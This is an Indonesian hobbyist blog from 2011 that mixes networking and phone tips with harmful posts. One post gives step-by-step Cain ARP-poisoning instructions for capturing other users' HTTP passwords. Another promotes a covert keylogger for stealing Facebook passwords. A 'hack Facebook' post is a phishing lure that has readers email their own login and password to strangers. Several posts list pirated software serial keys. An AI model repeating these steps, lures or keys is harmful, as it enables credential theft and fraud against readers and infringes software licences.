Selasa, 27 September 2011

bagi agan-agan yang punya aplikasi tapi gak tahu serial numbernya,,nih gua sharing SN semua aplikasi yang bisa agan download disini (update) atau disini

Jika bermanfaat,jangan lupa tinggalkan komentar anda
 
referensi
http://worldfreshmedia.com

Selasa, 02 Agustus 2011

Pengembangan dari VLAN






kali ini saya akan melakukan pengembangan pada skema jaringan VLAN diatas, yaitu dengan menambahkan ACL.

ACL atau Access List Sebuah daftar yang disimpan oleh router Cisco untuk mengendalikan akses ke atau dari router terhadap beberapa layanan yang tersedia (misalnya, untuk membatasi agar paket dengan alamat IP tertentu supaya tidak meninggalkan suatu interface pada server jaringan)

mengerti ? jadi ACL ini seperti daftar peraturan atau semacamnya, nah di peraturan ini ada beberapa list yang berfungsi untuk filterisasi


ACL ini akan memfilter paket-paket data yang tidak memenuhi syarat yang sudah ditetapkan,
ACL ini ada banyaaak variannya, Timed-ACL, Named ACL, Standard ACL, Extended ACL dan lain-lain


Nah kali ini saya akan mempraktekan konfigurasi ACL untuk Jaringan VLAN yang sudah saya posting sebelumnya. ACL ini bekerja pada Router, lalu di-attachkan pada subinterface yang sudah terkonfigurasi.

Start From Here

pada Skema tersebut ada 4 VLAN
VLAN 2 - IP Network 192.168.2.0
VLAN 3 - IP Network 192.168.3.0
VLAN 4 - IP Network 192.168.4.0
VLAN 5 - IP Network 192.168.5.0

kali ini saya akan membuat daerah VLAN 5 tidak bisa di akses oleh  VLAN lainnya dan sebaliknya
tetapi VLAN 2 3 4 masih dapat berkomunikasi.

Konfigurasi ACL Blok VLAN 2 ke VLAN 5

Router>en
Router#conf t
1. Router(config)#access-list 100 deny ip 192.168.2.0 0.0.0.255 192.168.5.0 0.0.0.255
2. Router(config)#access-list 100 permit ip 192.168.2.0 0.0.0.255 any



access-list 100 adalah access list extended, karena membutuhkan filterisasi yang lebih detail

deny ip adalah peraturan untuk menolak paket ip dari network
192.168.2.0 0.0.0.255 adalah ip network si pengirim, dan kita menggunakan wildcard bits
192.168.5.0 0.0.0.255 adalah ip network tujuan,

Nah ! setelah membuat access list nomor 1, kita juga harus memasukan access list nomor 2, jika tidak maka jaringan 192.168.2.0 tidak dapat berkomunikasi dengan jaringan lain .

lalu kita pasangkan access-list ini ke interface VLAN 2, karena VLAN 2 ini yang kita filter
Router(config)#interface fastEthernet 0/0.2
Router(config-subif)#ip access-group 100 in
Router(config-subif)#

( maksud dari in ini adalah, paket tersebut difilter pada saat masuk ke interface fa0/0.2 )

Konfigurasi ACL Blok VLAN 3 ke VLAN 5

1. Router(config)#access-list 101 deny ip 192.168.3.0 0.0.0.255 192.168.5.0 0.0.0.255
2. Router(config)#access-list 101 permit ip 192.168.3.0 0.0.0.255 any


Router(config)#interface fastEthernet 0/0.3
Router(config-subif)#ip access-group 101 in
Router(config-subif)#

Kita harus membuat access-list baru lagi, yaitu access-list 101 lalu kita tinggal merubah ip jaringan pengirim saja, dan memasangkannya pada subinterface fa0/0.3

Konfigurasi ACL Blok VLAN 4 ke VLAN 5


1. Router(config)#access-list 102 deny ip 192.168.4.0 0.0.0.255 192.168.5.0 0.0.0.255
2. Router(config)#access-list 102 permit ip 192.168.4.0 0.0.0.255 any



Router(config)#interface fastEthernet 0/0.4
Router(config-subif)#ip access-group 102 in
Router(config-subif)#

Konfigurasi ACL Blok VLAN 5 ke VLAN 2 3 4



1. Router(config)#access-list 103 deny ip 192.168.5.0 0.0.0.255 192.168.2.0 0.0.0.255 
2. Router(config)#access-list 103 deny ip 192.168.5.0 0.0.0.255 192.168.3.0 0.0.0.255  
3. Router(config)#access-list 103 deny ip 192.168.5.0 0.0.0.255 192.168.4.0 0.0.0.255 
4. Router(config)#access-list 103 permit ip 192.168.5.0 0.0.0.255 any

Router(config)#interface fastEthernet 0/0.5
Router(config-subif)#ip access-group 103 in
Router(config-subif)#





Nah ! sekarang VLAN 2 3 4 tidak dapat berkomunikasi dengan VLAN 5 dan sebaliknya, tetapi VLAN 2 34 dapat saling berkomunikasi

anda dapat mengeksplorasi access-list dengan menambahkan tanda ? contoh : access-list ?
maka akan terlihat syntax-syntax berikut fungsinya

Semoga tutorial ini membantu dan selamat mecoba .

Refrensi :
http://www.total.or.id/info.php?kk=access%20list
Bagi yang Newbie di Dunia desain,hendaknya jangan bersedih hati karena ada satu aplikasi yang seharusnya berbayar,Kini Saya bagikan dengan Gratis untuk anda.
AAA Logo 2010 adalah aplikasi yang mudah bagi kita untuk membuat desain logo atau sejenisnya,dengan AAA logo 2010,semua kalangan bisa membuat satu desain yang hebat,bukan hanya designer.

Bagi yang ingin download Aplikasinya bisa Lewat SINI (4Shared)

Salam Virus-86
Spy Monitor adalah salah satu Aplikasi yang berfungsi untuk merekam segala aktivitas Pengguna komputer.Aplikasi ini merekam dengan Rahasia .Untuk menampilkanya kita harus menekan Ctrl + F1.Aplikasi ini adalah salah satu tool hacked yang banyak di gunakan oleh para hacker yang ingin membobol Facebook Kita dan mengambil password kita.
Bagi yang pingin download Spy monitor ini silahkan disedot GAn


Saran Virus-86,,Jangan disalahkan BroO,,Berbuat buruk pada orang lain adalah dosa bagin kita.Apa gunanya bahagia diatas penderitaan Orang lain.


Aplikasi ini hanya sebagai bahan pembelajaran.

Kamis, 28 Juli 2011

Nokia 1100 disassembly

Nokia 1112 disassembly

Nokia 1208 disassembly

Nokia 2220 Slide disassembly

Nokia 2310 disassembly

Nokia 2330 Classic disassembly

Nokia 2600 Classic disassembly

Nokia 2610 disassembly

Nokia 2630 disassembly

Nokia 2680 Slide disassembly

Nokia 2730 Classic disassembly

Nokia 3110 Classic disassembly

Nokia 3120 disassembly

Nokia 3120 Classic disassembly

Nokia 3200 disassembly

Nokia 3220 disassembly

Nokia 3230 disassembly

Nokia 3310 disassembly

Nokia 3410 disassembly

Nokia 3500 Classic disassembly

Nokia 3600 Slide disassembly

Nokia 5000 disassembly

Nokia 5130 Xpress Music disassembly

Nokia 5200 disassembly

Nokia 5220 Xpress Music disassembly

Nokia 5230 disassembly

Nokia 5300 disassembly

Nokia 5310 Xpress Music disassembly

Nokia 5320 Xpress Music disassembly

Nokia 5530 Xpress Music disassembly

Nokia 5610 Xpress Music disassembly

Nokia 5800 Xpress Music disassembly

Nokia 6110 Navigator disassembly

Nokia 6111 disassembly

Nokia 6120 Classic disassembly

Nokia 6124 Classic disassembly

Nokia 6131 disassembly

Nokia 6210 disassembly

Nokia 6210 Navigator disassembly

Nokia 6220 Classic disassembly

Nokia 6230 disassembly

Nokia 6233 disassembly

Nokia 6234 disassembly

Nokia 6280 disassembly

Nokia 6300 disassembly

Nokia 6303 Classic disassembly

Nokia 6310i disassembly

Nokia 6500 Classic disassembly

Nokia 6500 Slide disassembly

Nokia 6600 Fold disassembly

Nokia 6600 Slide disassembly

Nokia 6680 disassembly

Nokia 6681 disassembly

Nokia 6700 Classic disassembly

Nokia 7070 Prism disassembly

Nokia 7100 Supernova disassembly

Nokia 7310 Supernova disassembly

Nokia 7500 Prism disassembly

Nokia 7510 Supernova disassembly

Nokia 7610 Supernova disassembly

Nokia 7900 Prism disassembly

Nokia E50 disassembly

Nokia E51 disassembly

Nokia E61 disassembly

Nokia E65 disassembly

Nokia E71 disassembly

 Nokia E90 disassembly

Nokia N70 disassembly

Nokia N73 disassembly

Nokia N75 disassembly

Nokia N8 disassembly

Nokia N80 disassembly

Nokia N81 8GB disassembly

Nokia N82 disassembly

Nokia N85 disassembly

Nokia N86 8MP disassembly

Nokia N95 disassembly

Nokia N95 8GB disassembly

Nokia N96 disassembly

Nokia N97 disassembly

Nokia N97 Mini disassembly

Nokia N Gage disassembly

Nokia X3 disassembly

Nokia X6 disassembly

Sumber FormyMobile
1.Jalankan kuku Anda di sekitar tepi penutup depan casing

 













2 .Buka ke 4 Sekrup yang ada di depan LCD

 













3 Setelah Anda membuka empat sekrup,Anda dapat mengangkat bingkai logam yang ada di atas LCD














4.Anda sekarang dapat mengangkat LCD dari telepon. LCD terpasang dan terhubungkan dengan plug dan soket. Cukup angkat ke atas untuk mencabut. Anda sekarang dapat membuka LCD


Jumat, 15 Juli 2011

karena masih banyak member yang masih bingung dengan cara Donlot film di TheHack3r.com yang baru, nih gua bantu dengan panduannya

 1.Di cara yang terbaru ini, tidak ada link Donlot langsung menuju list file yang harus kita Donlot, kita harus copy manual ke browser, kita coba pada film Harry Potter 7 : thehack3r.com/showthread.php/603, perhatikan gambar ini :






Perhatikan tulisan paling bawah : “(rb/id|Hp7-tp)”
Pada baris rb/id artinya adalah Kualitasas film BRRip, Sudah termasuk Subtitle Indonesia
Hp7-tp : Ini link menuju halaman yang ada link Donlotnya yang bisa kita copy kan ke Browser, tambahkan “click-me.us/” nanti jadinya http://click-me.us/Hp7-tp
  

 2.jika sudah mengcopy http://click-me.us/Hp-7 di browser kita dan lalu tekan ENTER, anda akan dibawa ke halaman blog yang terdapat link untuk mendonlot. Lalu lihat kembali bagian bawah blog tersebut, seperti dibawah ini:






Lihat dibagian (Michael/zk4), ini rinciannya = (Nama Penulis Review/Link untuk dicopykan ke browser memakai http://getbucks.in/)
Jadinya nanti seperti ini: http://getbucks.in/zk4



3.sekarang anda sudah berada di tiny*paste
jika muncul seperti gambar dibawah ini, anda dapat menghilangkan iklan sponsor tiny*paste dengan cara enter kembali browser anda, karena iklan tiny*paste hanya muncul sekali dalam 1 session browser...  








Setelah iklan tiny*paste hilang, silahkan sorot ke bawah dan anda akan menemukan kolom tiny*paste

lalu paste password di kolom tersebut, klik submit atau enter. Passwordnya adalah : "thehack3r.com" (tanpa tanda petik)

4.selamat! sekarang anda berada di tin*paste sepenuhnya
biasanya terdapat 2 pilihan, file*serve dan media*fire
subtitle juga KADANG TERPISAH dan terdapat disini








5.copy link nya ke tab baru pada Browser anda, terserah anda mau dari yangmana saja lihat contoh gambar, salin di situ adalah copy jadi sama saja ya,, saya memilih menDonlot dari media*fire

 




6.Selamat anda sudah berada di , ulangi lagi masukan password
ketik thehack3r.com pada kolom untuk dapat mendonlot file, jika pada tahap ini anda terus menerus diminta memasukkan password ATAU broeser anda refresh terus menerus, itu berarti server media*fire sedang padat, atau traffic donlot file tersebut sedang padat








7 .Alangkah Baiknya anda disini downlad pake idm yang bisa anda dapatkan disini

dan untuk Serial numbernya pilih dibawah sini

Internet Download Manager 5.12
S/N: 7G7QY-NZWKQ-23KRA-RAMQ4
S/N: SPOZ9-2E9IO-AKDRY-LIKEU
Internet Download Manager 5.14
S/N: ZFX1T-5VOMY-ZIT4Y-FHFPD
Internet Download Manager 5.14.1.0
S/N: Y30OZ-DNQH7-FRWPW-YYZMA
Internet Download Manager 5.15.6
S/N: Y5LUM-NFE0Q-GJR2L-5B86I
S/N: 4BTJF-DYNIL-LD8CN-MM8X5
S/N: XAGZU-SJ0FO-BDLTK-B3C3V
Internet Download Manager 5.17.3
S/N: RLDGN-OV9WU-5W589-6VZH1
S/N: HUDWE-UO689-6D27B-YM28M
S/N: UK3DV-E0MNW-MLQYX-GENA1
S/N: 398ND-QNAGY-CMMZU-ZPI39
S/N: GZLJY-X50S3-0S20D-NFRF9
S/N: W3J5U-8U66N-D0B9M-54SLM
S/N: EC0Q6-QN7UH-5S3JB-YZMEK
S/N: UVQW0-X54FE-QW35Q-SNZF5
S/N: FJJTJ-J0FLF-QCVBK-A287M
 
Dibannednya satu alamat domain seperti halnya co.cc dari google, tentu akan menyebabkan kerugian yang amat besar pagi para domain tersebut. Sebab seperti kita ketahui kebanyakan pengunjung situs dan blog yang tidak menjadi brand image, maka sudah dapat dipastikan kebanyakan pengunjung tersebut adalah berasal dari mesin pencari.

Sejauh ini memang belum dapat dipastikan apakah memang benar domain cc.cc sudah dibanned google. Namun sebagai blogger kita semua tentunya berharap agar kejadian hilangnya domain co.cc dari google ini, kiranya akan segera berakhir dan tidak merugikan teman-teman blogger yang selama ini berkutat dengan domain co.cc-nya Seperti www.virus86.co.cc
Kenapa Harus Virus86 ?

Mungkin Itu adalah pertanyaan anda ketika anda pertama kali berkunjung ke blog ini.Memang pertanyaan yang masuk akal.virus86 bukanlah blog yang menyediakan anda beragam virus,,SALAH BESAR...!!!!
Saya terinspirasi menggunakan virus86 sebagai nama blog karena saya doyan cari informasi tentang pembuatan virus,dan virus pertama buatan saya yang berhasil adalah virus yang berekstensi .exe yang saya bingung mau di beri nama apa,,Terlintas dibenak saya begitu saja untuk memakai VIRUS86 untuk menjadi nama virus buatan saya,jadilah VIRUS86.EXE....

Singkat Cerita,Saya di kenal sebagai virus di lingkungan kampus saya,karena mereka sudah tahu bahwa saya adalah pembuat virus yang menyebabkan hampir semua Komputer-lab Mereka Hang oleh virus86.
Karena saya sudah dikenal dengan sebutan virus,,maka blog saya juga langsung saya namakan www.virus86.co.cc

Sekian Dulu pengalaman saya dalam dunia komputer yang sebenarnya sangat dangkal.tapi apa salahnya kita dalam mengekspresikan sesuatu dalam segala media yang ada.

salam

Kamis, 14 Juli 2011

Facebook Adalah salah satu Jejaring social yagn sudah tak di ragukan lagi ketenaranya.Terbukti dari Penggunanya yang mencapai Milyaran Orang,dan Hampir dua juta orang perhari mengklik tombol Facebook,Namun Semua itu akan segera berubah seiring Hadirnya satu Situs jejaring social yang telah di luncurkan oleh Search engine nomor satu di dunia GOOGLE yang diberi nama Google+.Banyak keunggulan dari google plus yang tidak di miliki oleh social networking lainnya.
inilah beberapa situs yang bisa dikunjungi untuk google+

dan untuk mobile atau handphone bisa lewat situs ini

Rabu, 13 Juli 2011

Ponsel-ponsel dengan memory besar saat ini memang sudah banyak bertebaran.Kapasitasnya beragam,mulai dari puluhan Mega,hingga yang memakai Hard Disk dalam hitungan Giga.
Meski demikian,keberadaan karu memory masih sangat dipeerlukan oleh sebuah ponsel.Paling tidak untuk saat ini.Kartu memory memiliki keunggulan yang tidak dimiliki oleh memory internal ponsel.Selain mudah dipertukarkan,kartu memory juga mudah dibawa-bawa dan dapat dipergunakan sebagai back up data.Kartu memory juga dapat dibaca dengan mudah di komputer dengan menggunakan Card reader.
Meski kartu memory memiliki banyak keunggulan,bukan berarti keberadaannya tanpa kekurangan.MMC,RS-MMC,Mini SD dan kartu memory lainnya tergolong barang elektronik yang rentan dan mudah rusak.Baik akibat listrik,cuaca atau tekanan fisik.
disini virus86 berikan Solusi bagi anda untuk memperbaiki memori hp tersebut yaitu dengan Aplikasi 7TOOLSPARTITION yang bisa di download DISINI (download via 4Shared)

Selasa, 12 Juli 2011

Cain adalah sebuah software yang dapat digunakan untuk melakukan hacking via LAN (snifing).dan kita hanya perlu sedikit pemahaman tentan Command prompt untuk melihat ip address kita.
Oke.Langsung Adja Download Cain DISINI

Apa yang harus Dilakukan...??
1.buka CMD dan ketikan ipconfig
2.lihat ip kita..
3.Masuk pada aplikasi cain yang kita sudah install di PC kita tadii.
4.Klik start ARP dan start snifing
5.setelah itu klik tab snifing lalu klik kanan dan pilih scan MAC adress]
6.Klik tab ARP di bagian bawah, lalu klik tanda tambah “+” untuk add, maka akan keluar kotak dialog
7.Pada kotak kiri klik IP server dan pada kotak kanan klik IP korban. Lakukan berulang-ulang untuk nge-hack semua IP adress korban yang ada
8.Setelah selesai maka akan dilakukan proses poisoning terhadap semua IP korban.
9.Untuk hasilnya, silahkan klik tab password pada bagian bawah dan klik HTTP.
10.Selesai.......


Tulisan ini saya buat semata-mata hanya membagi pengetahuan saya tentang hacking.jangan sampai membuat anda menjadi orang yang jahat. Lakukanlah semua itu hanya karna kesenangan bukan karna ingin merugikan orang lain. Marilah kita bersama-sama menjadi hacker yang cinta damai.ThaNkS BRoo...
salam VIRUS86

Selasa, 28 Juni 2011

Software ini adalah satu aplikasi andalan Para Pecinta download.Karena Cara pakainya yang bersahabat dan di dukung dengan banyak keunggulan.
Apapun keunggulan versi idm 6.04 adalah:
* Fixed bug
* Peningkatan download video di web
* Panel akan muncul di lebih banyak jumlah situs populer.
* Ditambahkan dukungan penuh untuk browser 64-bit
* Lengkap revisi integrasi browser. Peningkatan integrasi IDM
* Untuk Google Chrome, Opera, dan browser lainnya. Tetap kompatibilitas
* Masalah dengan browser. Ditambahkan panel download untuk browser.

Semoga Artikel ini bermanfaat untuk kamu.untuk mendapatkan idm versi terbaru klik adja DISINI dan untuk serial numbernya silahkan pilih dibawah ini.tapi sebelumnya matikan dulu koneksi internet anda,bagi yang belum tahu caranya nie aku share juga yach..
1.Klik start dan pilih Control Panel











2.PilihNetwork and internet connection kemudian network connection







3.kemudian klik kanan pada local area connection dan pilih Disable






4.Selesai.Tinggal masukin serial numbernya dan selamat menikmati idm full version 6.04

(Untuk mengembalikan koneksi internet lakukan cara yang tadi)

serial number idm





Selasa, 21 Juni 2011

thehack3r adalah Salah satu situs download film terbesar di Indonesia.namun masih banyak kita yang tidak tahu bagaimana cara download film di situs tersebut.
syaratnya sih mudah.kita hanya di haruskan punnya akun di situs tersebut dengan melakukan registrasi.dengan asumsi bahwa kalau kita punya akun di thehack3r,maka kita di izinkan juga untuk melakukan download film yang sudah di sediakan oleh situs tersebut.mudah kan,,,???
oke.,jika anda berminat,,maka langsung klik adja disini untuk masuk ke form pendaftaran akun thehack3r

Setelah melakukan pendaftaran,,Maka masuklah dengan akun yang anda buat tadi.setelah itu baca panduan downloadnya.Selesai deh,,

Salam virus86

Rabu, 15 Juni 2011

Tanpa Banyak Komentar..LAngsung Klik adja Disini dan Nikmatilah Apa yang kamu Mau File ini bisa masuk ke situs web porno tentu saja harus ada koneksi internet.Oleh karena itu file ini tidak akan jalan kalau tidak ada koneksi internet.

Salam Viru86

Jumat, 27 Mei 2011

Buat Pemula Yang Takut linux,,Nih Gue KAsih 1 Tips buat kamu untuk tidak takut lagi dengan linux,,karena linux bisa kok kamu buat hampir mirip dengan Windows-7,,gak percaya..Nih Dia Langkah-Langkahnya...

1.Install Linux dulu d PC kamu.Kalau Sudah Ada yAhc tinggal Oprek Doank..
2.download Win2-7 Di Sini
3.setelah Kamu Download,,Jalankan Linux kamu,,Dan extract File yang barusan Kamu Download Tersebut..
4.Setelah itu Cari file Install.sh dan klik itu terus Pilih Run in terminal
5.setelah itu Untuk Pengaturanya yachh Terserah Kamu..


Untuk Contoh Hasilnya Seperti Gambar Ini 



Semoga Bermanfaat


Salam VIRUS86






DapaT Tugas nihh Dari Dosenku Memnghubungkan MysQl dengan Eclipse..,Banya Teman-teman aku Yang Udah Pada Lupa dengan Perintah MySQl,,Akhirnya Terpikir Olehku untuk Posting Nie Perintah,,See It,,

SQL DASAR

  
1. Membuat Database Baru

    * Menampilkan database

          mysql> SHOW DATABASES;

    * Membuat database

          mysql> CREATE DATABASE [Nama databasemu];

    * Menggunakan database

          mysql> USE [Nama databasemu];

    * Menghapus database

          mysql> DROP DATABASE [Nama databasemu];

2. Membuat Table Baru

    * Menampilkan table

          mysql> SHOW TABLES FROM [Nama databasemu];

    * Membuat table

          mysql> CREATE TABLE [Nama tablemu] ( [nama column] [type column], [...]);

      Contohnya:

          mysql> CREATE TABLE anggota ( ID int(100), Nama varchar(255));

    * Menampilkan column

          mysql> SHOW COLUMNS FROM [Nama tablemu];

    * Menghapus table

          mysql> DROP TABLE [Nama tablemu];


Menambahkan Indexing dan Keys kedalam Table:

    mysql> ALTER TABLE [Nama tablemu] ADD INDEX ([Nama column yang ingin diberikan index]);

Contohnya:

    mysql> ALTER TABLE anggota ADD INDEX (Nama);

    mysql> CREATE TABLE [Nama tablemu] ( [nama column] [type column], [...],PRIMARY KEY ([nama column yang ingin diberikan key]));

Contohnya:

    mysql> CREATE TABLE anggota ( ID int(100), Nama varchar(255),PRIMARY KEY (ID));

3. Manipulasi Data

    * Memasukan data

          mysql> INSERT INTO [Nama tablemu] ([Nama column]) VALUES ([Isi/Nilai column]);

      Contohnya:

          mysql> INSERT INTO anggota (ID, Nama) VALUES (1,”Yustian”);

    * Mengupdate data

          mysql> UPDATE [Nama tablemu] SET [Nama column]=[Isi/Nilai column] WHERE [Kondisi yang data diinginkan];

      Contohnya:

          mysql> UPDATE anggota SET Nama=“Yustian” WHERE ID=1;

    * Menghapus data

          mysql> DELETE FROM [Nama tablemu] WHERE [Kondisi yang data diinginkan];

      Contohnya:

          mysql> DELETE FROM anggota WHERE ID=1;

4. Mengubah Table

    * Mengganti nama table

          mysql> ALTER TABLE [Nama tablemu] RENAME [Nama yang baru];

      Contohnya:

          mysql> ALTER TABLE anggota RENAME anggotaku;

    * Menambah column ke dalam table

          mysql> ALTER TABLE [Nama tablemu] ADD [nama column] [type column], [...];

      Contohnya:

          mysql> ALTER TABLE anggota ADD Nama char(100);

    * Menghapus column

          mysql> ALTER TABLE [Nama tablemu] DROP [nama column];

      Contohnya:

          mysql> ALTER TABLE anggota DROP Nama;

    * Mengganti nama dan type column

          mysql> ALTER TABLE [Nama tablemu] CHANGE [nama column] [Nama column yang baru] [type column], [...];

      Contohnya:

          mysql> ALTER TABLE anggota CHANGE Nama Username varchar(255);

 Salam Virus86

Rabu, 18 Mei 2011

Berikut ini adalah kunci kode tombol rahasia yang dapat anda jalankan sendiri dengan mengetiknya di keypad hp ponsel anda yang bermerek Nokia baik yang cdma maupun yang gsm.

1. Melihat IMEI (International Mobile Equipment Identity)
Caranya tekan * # 0 6 #
2. Melihat versi software, tanggal pembuatan softwre dan jenis kompresi software
Caranya tekan * # 0 0 0 0 #
Jika tidak berhasil coba pencet * # 9 9 9 9 #
3. Melihat status call waiting
Caranya tekan * # 4 3 #
4. Melihat nomor / nomer private number yang menghubungi ponsel anda
Caranya tekan * # 3 0 #
5. Menampilkan nomer pengalihan telepon all calls
Caranya tekan * # 2 1 #
6. Melihat nomor penelepon pada pengalihan telepon karena tidak anda jawab (call divert on)
Caranya tekan * # 6 1 #
7. Melihat nomor penelepon pada pengalihan telepon karena di luar jangkauan (call divert on)
Caranya tekan * # 6 2 #
8. Melihat nomor penelepon pada pengalihan telepon karena sibuk (call divert on)
Caranya tekan * # 6 7 #
9. Merubah logo operator pada nokia type 3310 dan 3330
Caranya tekan * # 6 7 7 0 5 6 4 6 #
10. Menampilkan status sim clock
Caranya tekan * # 7 4 6 0 2 5 6 2 5 #
11. Berpindah ke profil profile ponsel anda
Caranya tekan tombol power off tanpa ditahan
12. Merubah seting hp nokia ke default atau pabrikan
Caranya tekan * # 7 7 8 0 #
13. Melakukan reset timer ponsel dan skor game ponsel nokia
Caranya tekan * # 7 3 #
14. Melihat status call waiting
Caranya tekan * # 4 3 #
15. Melihat kode pabrik atau factory code
Caranya tekan * # 7 7 6 0 #
16. Menampilkan serial number atau nomer seri hp, tanggal pembuatan, tanggal pembelian, tanggal servis terakhir, transfer user data. Untuk keluar ponsel harus direset kembali.
Caranya tekan * # 92702689 #
17. Melihat kode pengamanan ponsel anda
Caranya tekan * # 2 6 4 0 #
18. Melihat alamat ip perangkat keras bluetooth anda
Caranya tekan * # 2 8 2 0 #
19. Mengaktifkan EFR dengan kualitas suara terbaik namun boros energi batere. Untuk mematikan menggunakan kode yang sama.
Caranya tekan * # 3 3 7 0 #
20. Mengaktifkan EFR dengan kualitas suara terendah namun hemat energi batere. Untuk mematikan menggunakan kode yang sama.
Caranya tekan * # 4 7 2 0 #
21. Menuju isi phone book dengan cepat di handphone nokia
Caranya tekan nomer urut lalu # contoh : 150#
22. Mengalihkan panggilan ke nomor yang dituju untuk semua panggilan
Caranya tekan * * 2 1 * Nomor Tujuan #
23. Mengalihkan panggilan ke nomor yang dituju untuk panggilan yang tidak terjawab
Caranya tekan * * 6 1 * Nomor Tujuan #
24. Mengalihkan panggilan ke nomor yang dituju untuk panggilan ketika telepon hp anda sedang sibuk
Caranya tekan * * 6 7 * Nomor Tujuan #

Keterangan
 Ada kode-kode nokia yang berlaku pada tipe tertentu saja
BAGI KAMU YANG MEMPUNYAI KASUS HP TIBA2 HANK EROR GAK BISA HIDUP CUMA ADA TULISAN NOKIA JGN KAWATIR JANGAN LANGSUNG DIBAWA KE SERVISAN YANG MAHAL HAHAHA...mari kita perbaiki sendiri cekidot:

1.PASTIKAN BATERAI HP DALAM KONDISI PENUH..KARENA APABILA DALAM KEADAAN TIDAK FULL,DILUAR TANGGUNG JAWAB SAYA SEBAGAI PENULIS ARTIKEL INI,KARENA AKAN MENYEBABKAN HP ANDA MATI TOTAL

2.MATIKAN HP LEPAS KARTU MEMORI DAN SIM CARD..(KARENA AKAN MENGHAPUS DATA DI KARTU SIM)

3.TEKAN TOMBOL *(BINTANG) ,3(ANGKA 3),TOMBOL HIJAU (TOMBOL UNTUK ANGKAT TELPON),TOMBOL ON/OFF TEKAN KEEMPAT TOMBOL TERSEBUT BERSAMA2 SAMPAI ADA TULISAN FORMATING HEHEHE TUNGGU HINGGA LOADING SELESAI.. 


TIPS TAMBAHAN

tekan *#7370# lalu ada perintah telp akan direstar pilik ok
masukan password tlp mu kalo standar 12345 biasanya

tips setelah selesai format jangan buru2 memasukan mmc kedalam hp

tunggu delay 1jam.. setelah 1jam baru masukan mmc ke hp

ini mencegah mmc terkunci karna sepengalaman saya mmc pada 6600 terkunci gara2 diformat hp tanpa melepas mmc.. dan memasukan mmc setelah format selesai..

Selasa, 10 Mei 2011

Nih Gue Share buat kamu yang ingin buka usaha sampingan,atau warnet,Namun tak punya uang untuk beli billing,,Nih gue share Aplikasi Billing., Mau,,Download DISINI

Jumat, 06 Mei 2011

Kalian Pernah Mengalami Browser Untuk Beberapa Saat hang,?Trus Setelah itu muncul IDM yang meminta untuk mendownload file suara Tertentu,Pasti itu bisa terjadi pada kalian di saat kalian facebookan,Dan Sebagian orang dari kamu merasa jengkel dan ingin menonaktivkannya,Tapi tidak tahu Cara Mematikan Auto Download.Disini saya Akan Berbagi Beberapa Tips Untuk Mematikan auto download tersebut
1.Buka IDM
2.Klik Menu -->Option
3.kemudian Klik File Types-->Edit List
4.Centang Tulisan Show Dialog to add,Kemudian OK.

Kalian Juga Bisa menambahkan Alamat atau URL dengan manual contohnya
kamu tidak ingin Auto Download muncul ketika kamu sedang melakukan chatting di facebook,Kamu bisa memasukan Url ini http://static.javascript:void(0)ak.fbcdn.net/soud/pop.mp3

Semoga Bermanfaat..
Salam Virus86

Selasa, 03 Mei 2011

Jika anda ingin mematikan komputer windows anda pada waktu dan jam yang anda tentukan, tanpa klik menu shutdown dan tanpa harus menungguinya, hal ini bisa dilakukan tanpa menggunakan software tambahan.
Caranya Sangat Mudah kok,,
• Klik Start, Klik RUN
• Ketik (contoh) at 10:30 shutdown -s lalu klik OK (ganti jam sesuai dengan waktu yang anda inginkan)

Maka komputer akan mati pada jam 10:30

• Untuk membatalkan, masuk lagi ke RUN command dan ketik shutdown -a kemudian klik OK.

Semoga Bermanfaat Yach,,

Jangan Lupa Komentarnya..,,

Salam VIRUS86

Senin, 02 Mei 2011

Apa sih maksud dari judul posting ini, sepertinya agak aneh? begini nih teman-teman, jika kita sedang mengedit template dan melihat hasilnya maka pada sudut-sudut element akan terlihat icon bergambar obeng dan tang.

1. Login ke blogger dengan ID anda tentunya.
2. Klik Tata Letak.
3. Klik tab Edit HTML.
4. Cari kode seperti ini :



]]>


5.Copy paste kode berikut persis di atas kode yang tadi :



.quickedit{
display:none;
}


6.

Klik tombol Simpan template.
7.

Selesai.

Kamis, 28 April 2011

Pernah Liat film Matrix Nggak,,Komputer bisa bicara,,pasti kalian hanya anggap itu hanya hayalan semata kan,,Kalian juga bisa kok buat komputer kalian bersuara,,Nih aku kasih tahu caranya,,
1.buka notepad atau ketik (Tahan)logo window di keyboard + R kemudian ketikan pada kotak notepad
2.masukan kode berikut
Dim msg, sapi
msg = "tulis kata-kata terserah anda"
Set sapi = CreateObject ( "sapi.spvoice")
sapi.Speak msg

3.kemudian kalian save dengan nama terserah kalian.INGATT..Hanya formatnya harus .vbs dan save as type harus all format
4.klik 2 kali file yang kamu buat tadi dan bersiaplah untuk maju selangkah,,

gampang kann,,??Selamat mencoba yach,

Kamis, 10 Februari 2011

Ini Merupakan Permintaan Teman Saya yang Ingin Blognya Terlihat Cantik...Oleh Karena Itu saya Berniat Untuk Bagi-bagi script ini,,,bagi yang ingin mempercantik blognya bisa download scriptnya disini
setelah di download,,silahkan anda Masuk ke blog anda,,kemudian masuk pada rancangan,,trus pilih tambahkan gadget,,,setelah itu pilih html/java script..setelah itu anda paste script yang anda telah download tadi..
semoga bermanfaat..
salam virus86

Minggu, 06 Februari 2011

Biasanya Kita Hack facebook Orang lain Pake APlikasi seperti pyrates hack...Dan Anda Pun Bisa Download disini ..Passwordnya a1b,,,Tapi terkadang kita tidak tahu cara pakainya,,,oleh karena itu saya memberikan tutorial ini gratis ke anda yang mau mencoba,,,100 % berhasil...Mau...??
oke gann,,,Dsini Saya Akan memberikan 1 Tips Buat Anda yang MErasa Kecewa Dengan Teman,Pacar,istri,suami,atau siapapun yang di facebook,,..Anda mau Menyingkirkan Mereka dari dunia Facebokk,,,,Saya Punya 1 cara hack facebook tanpa harus Ada keahlian khusus,,.mau tahu,,,,????

1.modal Nekat...
2.siap menerima resiko,..
3.pertama anda masuk ke email anda,,.
4.kalau sudah berhasil masuk,,anda klik tulis yang ada di sudut kiri email anda..
5.tulislah pesan pada tim facebook seperti dibawah ini

kepada :Hacked_dark@yahoo.com
cc :team_facebook93@yahoo.com
judul :(Tergantung kebutuhan Anda)

yrZ658gTsc Hacked_dark blocking

Alamat E-mail korban
Contoh :ini adalah Alamt email Teman saya(umardoank@yahoo.co.id).ket email ini adalah alamat yang di pakai pada akun facebook.com

kemudian alamat email facebook anda
contoh : pass_hacked@yahoo.com
kemudian password Anda..
contoh : 12345678

zRt27VbaCmD

6.setelah semua itu anda lakukan maka kirim pesan tersebut dan tunggu pesan dari tim facebook untuk menanyakan apakah anda yakin menonaktifkan facebook alamat korban

ket :
